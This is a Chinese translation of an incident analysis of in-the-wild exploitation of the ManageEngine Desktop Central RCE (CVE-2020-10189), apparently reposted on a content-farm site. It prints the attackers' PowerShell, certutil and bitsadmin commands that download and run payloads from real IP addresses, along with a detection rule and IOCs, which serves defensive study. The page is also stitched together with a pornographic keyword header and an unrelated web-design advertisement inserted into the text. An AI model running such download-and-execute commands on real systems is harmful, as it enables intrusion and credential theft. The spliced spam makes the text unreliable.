日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
Desktop Central服務(wù)器RCE漏洞在野攻擊分析

0x01 漏洞披露

創(chuàng)新互聯(lián)公司長期為上千多家客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對不同對象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺(tái),與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為和平企業(yè)提供專業(yè)的成都網(wǎng)站建設(shè)、做網(wǎng)站,和平網(wǎng)站改版等技術(shù)服務(wù)。擁有10余年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。

在研究Desktop Central漏洞的過程中,我們在推特上找到了一位研究人員的帖子,該研究人員于2020年3月5日披露了Desktop Central的RCE漏洞。

Zoho ManageEngine Desktop Central 10允許遠(yuǎn)程執(zhí)行代碼,漏洞成因是FileStorage類的getChartImage中的不可信數(shù)據(jù)反序列化,此漏洞和CewolfServlet,MDMLogUploaderServlet Servlet有關(guān)。

對CVE-2020-10189的研究還顯示,可以在??Shodan??上搜索易受攻擊的Desktop Central服務(wù)器。

在公網(wǎng)發(fā)現(xiàn)的威脅是有可疑的PowerShell下載通訊錄,該通訊錄包含下載文件的說明。

最早威脅活動(dòng)之一是一些可疑的PowerShell下載命令。該命令包含指令,以下載install.bat并storesyncsvc.dll到C:\Windows\Temp,然后立即執(zhí)行install.bat(圖3)。

cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
esktop Central服務(wù)器RCE漏洞在野攻擊分析

圖3-可疑的PowerShell下載命令

該install.bat腳本包含storesyncsvc.dll作為服務(wù)安裝在系統(tǒng)上的說明。(圖4)。

??

圖4-Install.bat的內(nèi)容

在運(yùn)行PowerShell命令后,我們觀察到安裝了服務(wù)名稱StorSyncSvc和顯示名稱為Storage Sync Service(圖5)的新服務(wù)。

??

圖5-安裝Storage Sync Service

VirusTotal上的查詢結(jié)果表明,一些檢測引擎已經(jīng)歸類storesyncsvc.dll為惡意軟件。

??https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details??

0x02 利用過程跟蹤識(shí)別漏洞利用

此RCE漏洞已于2020年3月5日通過Twitter公開。

回顧Sysmon流程創(chuàng)建事件,表明C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe流程是負(fù)責(zé)執(zhí)行PowerShell Download命令的流程(圖6)。

??

圖6-ParentImage負(fù)責(zé)PowerShell的下載

查看內(nèi)存中的進(jìn)程,我們還觀察到Desktop Central java.exe應(yīng)用程序cmd.exe和2.exe之間的父/子進(jìn)程關(guān)系(圖7)。

??

圖7- java.exe父/子進(jìn)程關(guān)系

0x03 利用文件系統(tǒng)識(shí)別漏洞利用

為了進(jìn)一步驗(yàn)證我們的理論,我們將從受影響的Desktop Central服務(wù)器收集的信息與已發(fā)布的POC進(jìn)行了比較,確定攻擊者可能利用了CVE-2020-10189漏洞在此易受攻擊的系統(tǒng)上運(yùn)行代碼。

通過文件系統(tǒng)時(shí)間軸分析,我們確定遍歷文件寫可能已在具有文件名_chart(圖8)和logger.zip(圖9)的系統(tǒng)上發(fā)生   。

??

 圖8- _chart文件系統(tǒng)分析

??

圖9- logger.zip文件系統(tǒng)分析

這些文件名也在??@Steventseeley???發(fā)布的POC中進(jìn)行了??引用??(圖10)。

??

圖10-POC中對_chart和logger.zip的引用,參考:??https??? : ??//srcincite.io/pocs/src-2020-0011.py.txt??

0x04 引入系統(tǒng)命令

在隨后的流程創(chuàng)建日志中,cmd.exe使用certutil.exe命令來下載和執(zhí)行2.exe(圖11),進(jìn)一步的分析表明,很有可能   2.exe可能是C2工具Cobalt Strike的一部分。

cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe

??

圖11-Certutil命令

OSINT透露2.exe已被VirusTotal上的多個(gè)檢測引擎識(shí)別為惡意軟件:??https???:??//www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details??

利用app.any.run沙箱(圖12)和對惡意軟件的內(nèi)存分析,進(jìn)一步證實(shí)2.exe托管Cobalt Strike Beacon payload的可能性。

??

圖12- 2.exe被判定為惡意軟件

??https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6??

我們對已知惡意軟件2.exe所使用的所有內(nèi)存段進(jìn)行了yara掃描,yara掃描結(jié)果進(jìn)一步支持了2.exe在其他幾種可能的惡意軟件簽名的理論(圖13)。

??

圖13-Yarascan掃描結(jié)果

利用Volatility的惡意插件,我們確定了幾個(gè)可能存在代碼注入跡象的內(nèi)存部分,我們對另一個(gè)由malfind轉(zhuǎn)儲(chǔ)的內(nèi)存段進(jìn)行了yara掃描,進(jìn)一步證實(shí)了我們的猜想。

在下面的記錄中可以看到整個(gè)過程(圖14)。

(原文中查看完整過程)

圖14-Yarascan驗(yàn)證結(jié)果

然后,我們檢查了malfind的輸出以獲得代碼注入的證據(jù),并確定了其中的可疑內(nèi)存部分svchost.exe(圖15)。OSINT的研究使我們找到了一位研究人員,該研究人員對惡意軟件進(jìn)行了逆向,并找到了負(fù)責(zé)向其中注入代碼的部分svchost.exe(圖16)。

??

 圖15-對包含注入代碼的svchost的分析

??

圖16-@VK_Intel的分析顯示了可能的注入功能

參考:

在攻擊結(jié)束后,我們觀察到了惡意的Bitsadmin命令,其中包含install.bat從66.42.96.220可疑端口12345進(jìn)行轉(zhuǎn)移的指令。

我們的分析師觀察到,bitsadmin命令正在Desktop Central服務(wù)器上運(yùn)行,該命令包含在PowerShell下載命令中調(diào)用的相同IP地址,端口和相同的install.bat文件(圖17)。

cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\Users\Public\install.bat

??

圖17-Bitsadmin命令

0x05 訪問憑證

我們還觀察到了潛在的憑證訪問活動(dòng)。攻擊者執(zhí)行憑據(jù)轉(zhuǎn)儲(chǔ)的常用技術(shù)是使用惡意進(jìn)程(SourceImage)訪問另一個(gè)進(jìn)程(TargetImage),最常見的是將lsass.exe作為目標(biāo),因?yàn)樗ǔ0舾行畔?,例如帳戶憑據(jù)。

在這里,我們觀察到SourceImage 2.exe訪問TargetImage lsass.exe(圖18)。Cobalt Strike Beacon包含類似于??Mimikatz的??本機(jī)憑證轉(zhuǎn)儲(chǔ)功能,使用此功能的唯一必要條件是攻擊者具有的SYSTEM特權(quán),以下事件提供了充分的證據(jù)證明憑證訪問的風(fēng)險(xiǎn)很高。

??

圖18- 2.exe訪問lsass.exe

在對這種入侵進(jìn)行分析的過程中,我們向Eric Zimmerman的??KAPE???工具添加了一些收集目標(biāo)功能,以將??相關(guān)日志??添加到分類工作中。

工具地址:??https://binaryforay.blogspot.com/2019/02/introducing-kape.html??

針對相關(guān)日志的用法示例:

kape.exe --tsource C: --tdest c:\temp\tout --tflush --target ManageEngineLogs

Sigma項(xiàng)目的Florian Roth創(chuàng)建了一個(gè)簽名來檢測攻擊者利用的某些技術(shù):

??https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml??

我們對該攻擊的分析還發(fā)現(xiàn),在進(jìn)程創(chuàng)建日志中基于命令行活動(dòng)進(jìn)行檢測將很有價(jià)值:

ParentImage | endswith: 
  'DesktopCentral_Server\jre\bin\java.exe'
 CommandLine | contains: 
  '*powershell*'
  '*certutil*'
  '*bitsadmin*'

0x06 IOCs

·Storesyncsvc.dll

· MD5: 5909983db4d9023e4098e56361c96a6f

· SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c

·Install.bat

· MD5: 7966c2c546b71e800397a67f942858d0

· SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc

·2.exe

· MD5: 3e856162c36b532925c8226b4ed3481c

· SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309

· 66[.]42[.]98[.]220

· 91[.]208[.]184[.]78

· 74[.]82[.]201[.]8

本文翻譯自:https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/ https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle如若轉(zhuǎn)載,請注明原文地址


當(dāng)前名稱:Desktop Central服務(wù)器RCE漏洞在野攻擊分析
本文地址:http://m.5511xx.com/article/ccchije.html